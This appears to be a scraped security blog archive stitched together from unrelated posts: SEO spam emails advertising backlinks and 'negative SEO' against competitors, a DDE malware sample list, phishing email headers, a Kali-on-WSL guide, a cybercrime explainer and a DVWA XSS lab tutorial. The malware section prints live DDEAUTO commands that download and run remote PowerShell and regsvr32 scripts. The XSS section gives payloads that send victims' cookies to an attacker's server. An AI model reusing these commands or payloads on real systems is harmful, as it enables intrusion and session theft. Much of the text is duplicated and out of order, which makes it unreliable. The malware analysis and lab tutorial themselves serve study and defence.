hi
rebelde-sem-causa.htmlnoreply
here it is, social website traffic:
http://www.mgdots.co/detail.php?id=113
Full details attached
Regards
Lane Loew �
Unsubscribe option is available on the footer of our website
re: Cheap Facebook Traffic
terça-feira, 30 de junho de 2020
re: re: Boost SEO with quality EDU backlinks
terça-feira, 23 de junho de 2020
hi there
Yes, of course, here it is:
1000 Edu blog backlinks to improve your backlinks base and increase SEO
metrics and ranks
http://www.str8-creative.io/product/edu-backlinks/
Improve domain authority with more .edu blog backlinks
Apply 25% coupon and get your discount before the Offer ends
COUPON: 25XDISC
Contact us:
http://www.str8-creative.io/contact/
Unsubscribe from this newsletter
http://www.str8-creative.io/unsubscribe/
001 (516) 926-1772, 18 Richmond St, Albany, New York
2018-11-13, tr, 10:37 logynotec.secretpost
<logynotec.secretpost@blogger.com> raše:
Hi there&, Could you send me th$at Coupon again? for the edu links Thanks@
again, will wait your reply.
re: How to remove a site from top 10 for important keywords
segunda-feira, 22 de junho de 2020
Negative SEO with Satisfaction Guaranteed
http://www.blackhat.to
re: Additional Details
quinta-feira, 18 de junho de 2020
hi there
After checking your website SEO metrics and ranks, we determined
that you can get a real boost in ranks and visibility by using
aour 49 usd / Economy Plan:
https://www.hilkom-digital.com/product/economy-seo-plan/
thank you
Mike
re: I`m interested in your offer of Social Signals
quarta-feira, 17 de junho de 2020
hi
logynotec.secretpost
Glad to hear that, here are the details below
More information here:
http://www.realsocialsignals.co/buy-social-signals/
For the best ranking results, buy Monthly basis Social signals, provided
daily, month after month:
http://www.realsocialsignals.co/custom-social-signals/
Regards
Jaxson
http://www.realsocialsignals.co/unsubscribe/
2018-11-9, tr, 19:37 logynotec.secretpost
<logynotec.secretpost@blogger.com> ra�e:
Hi there, Please send me the Social signals offer that we talked about over
the phone. I`m interested and I want to boost my SEO metrics with this new
SEO method. Thanks again, will wait your rep^ly.
DDE Command Execution Malware Samples
sexta-feira, 12 de junho de 2020
Here are a few samples related to the recent DDE Command execution
Reading:
10/18/2017 InQuest/yara-rules
10/18/2017 https://twitter.com/i/moments/918126999738175489
10/10/2017 NViso labs: MS Office DDE YARA rules
Download
File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Payload
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669
File details with MD5 hashes:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Payload
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669
File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")
2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")
3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e.
4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e "
5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_
6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")
7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")
8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a
9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460
10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450
Payload Powershell
1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt
2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier
Payload PE
1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e
2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
4f3a6e16950b92bf9bd4efe8bbff9a1e
3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe Poland payload
09d71f068d2bbca9fac090bde74e762b
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")
2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")
3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e.
4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e "
5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_
6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")
7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")
8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a
9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460
10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450
Payload Powershell
1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt
2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier
Payload PE
1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e
2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
4f3a6e16950b92bf9bd4efe8bbff9a1e
3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe Poland payload
09d71f068d2bbca9fac090bde74e762b
Message information
For the EDGAR campaign
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [209.90.232.236]) by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for 89.106.109.106, 162.158.90.75
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_7608a3de5fe6c9bf7df6782a8aa9790f"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
signatures=0
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000
definitions=main-1710110060
This is a multi-part message in MIME format.
--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: multipart/alternative;
boundary="b2_7608a3de5fe6c9bf7df6782a8aa9790f"
--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/plain; charset=us-ascii
Important information about last changes in EDGAR Filings
--b2_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: text/html; charset=us-ascii
<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>
--b2_7608a3de5fe6c9bf7df6782a8aa9790f--
--b1_7608a3de5fe6c9bf7df6782a8aa9790f
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx
<snip>
--b1_7608a3de5fe6c9bf7df6782a8aa9790f--
for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
Received: from VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) by
AM4PR08MB2659.eurprd08.prod.outlook.com (10.171.190.148) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.77.7 via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com (10.172.252.17) by
VI1PR08MB2670.eurprd08.prod.outlook.com (10.175.245.20) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.77.7; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
(2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
(2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7; Thu, 12 Oct
2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
SMTP Server (version=TLS1_2,
cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.77.7 via Frontend
Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com (147.152.120.47) by
DB3FFO11FD006.mail.protection.outlook.com (10.47.216.95) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id
15.20.77.10 via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> (10.234.178.186) by
<snip>(10.144.20.58) with Microsoft SMTP
Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> (10.234.174.102) by
<snip> with Microsoft SMTP Server
id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown [85.115.52.190]) by
Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost [127.0.0.1]) by
rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by
rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
[188.166.157.242]) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
<Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
(BST)
Received: from authenticated-user (mx1.ssl-secure-mail.com [188.166.157.242])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
received-spf: Fail (protection.outlook.com: domain of <snip> does
not designate 147.152.120.47 as permitted sender)
receiver=protection.outlook.com; client-ip=147.152.120.47;
helo=<snip>;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"
MIME-Version: 1.0
Continue reading
Voodoo-Kali - Kali Linux Desktop On Windows 10
quinta-feira, 11 de junho de 2020
How it works?
* Kali Linux with XFCE Desktop Environment in Windows Subsystem for Linux (WSL)
* VcXsrv X Server for Windows is doing the hard GUI lifting
* XFCE is started natively in WSL and displayed by VcXsrv
Install Voodoo-Kali:
1, Enable WSL and install Kali Linux from the Microsoft Store. Read Install Kali Linux desktop on Windows 10 from Microsoft Store
2, To start Kali Linux in Windows 10, open Command Prompt and enter the command: kali
3, Enter this commands:
apt install wget -y
wget https://raw.githubusercontent.com/Re4son/WSL-Kali-X/master/install-WSL-Kali-X
bash ./install-WSL-Kali-X
4, Download and install VcXsrv Windows X Server from SourceForge
5, Start VcXsrv, accept change in firewall rules, exit VcXsrv
Run Voodoo-Kali:
Start kali in Windows as normal user (that's default), and launch Voodoo-Kali:
* as normal user: ./start-xfce
* as root: sudo /root/xtart-xfce
Run Kali Desktop in an RDP session:
In Kali Linux WSL, type: sudo /etc/init.d/xrdp start
In Windows 10, open Run and enter mstsc.exe and connect to "127.0.0.1:3390"
Status: Voodoo-Kali is in its infancy and it is far from being elegant. I'm working on it though and step by step I'll push out improvements. Below a snippet of the To-Do list:
* Clean up and comment the scripts
* Make for a cleaner exit
* Better error handling and dependency checking (get rid of sleep, etc.)
* Improve stability of Java programs
* Improve the looks??
* …
Any help is truly appreciated, in any shape or form – from tips to pull requests.
Why don't you join the forums to discuss?
Further Information:
* Offsec – Kali Linux in the Windows App Store
* MSDN – Windows Subsystem for Linux Overview
Download Voodoo-Kali
What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?
What is cyber crime?
Cybercrime is the use of computers & networks to perform illegal activities such as spreading viruses,online bullying,performing unauthorized electronic fund transfers etc. Most cyber crimes are committed through the internet.
Some cyber crime also be carried out using mobile phones via Sms and online chatting applications.
TYPES OF CYBERCRIME
The following list presents the common types of cybercrimes-
1-Computer Fraud-Intential deception for personal gain via the use of computer system.
2-Privacy Violations-Exposing personal information such as email addresses,phone numbers,account details etc, on social media,websites,etc.
3-Identity theft-Stealing personal information from somebody and impersonating that person.
4-Sharing copyright files/information-This involves distributing copyright protected files such as eBooks and computer program etc.
5-Electronic funds transfer-This involves gaining an unauthorized access to bank computer networks and making illegal funds transferring.
6-Electronic money laundering-This involves the use of the computer to launder money.
7-Atm fraud-This involves intercepting ATM card details such as account numbers and PIN numbers.These details are then used to withdraw funds from the intercepted accounts.
8-Denial of service attack-This involves the use of computers in multiple locations to attack servers with a view of shutting them down.
9-Spam:sending unauthorized emails.
These emails usually contain advertisements.
CYBER LAW
Under The Information Technology Act,2000
CHAPTER XI-OFFENCES-66. Hacking with computer system.
1-whoever with the Intent to cause or knowing that he is likely to cause Wrongfull Loss or Damage to the public or any person Destroys or Deletes or Alter any Information Residing in computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.
2-whoever commits hacking shell be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees,or with both.
Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)
quarta-feira, 10 de junho de 2020
In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
to something like this:
And now use your payload to steal some cookies:
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.
DOM, Sources, and Sinks:
DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.DOM Based XSS:
Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app."Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
http://localhost:9000/vulnerabilities/xss_d/?default=English
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
python3 -m http.server
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
Reflected XSS:
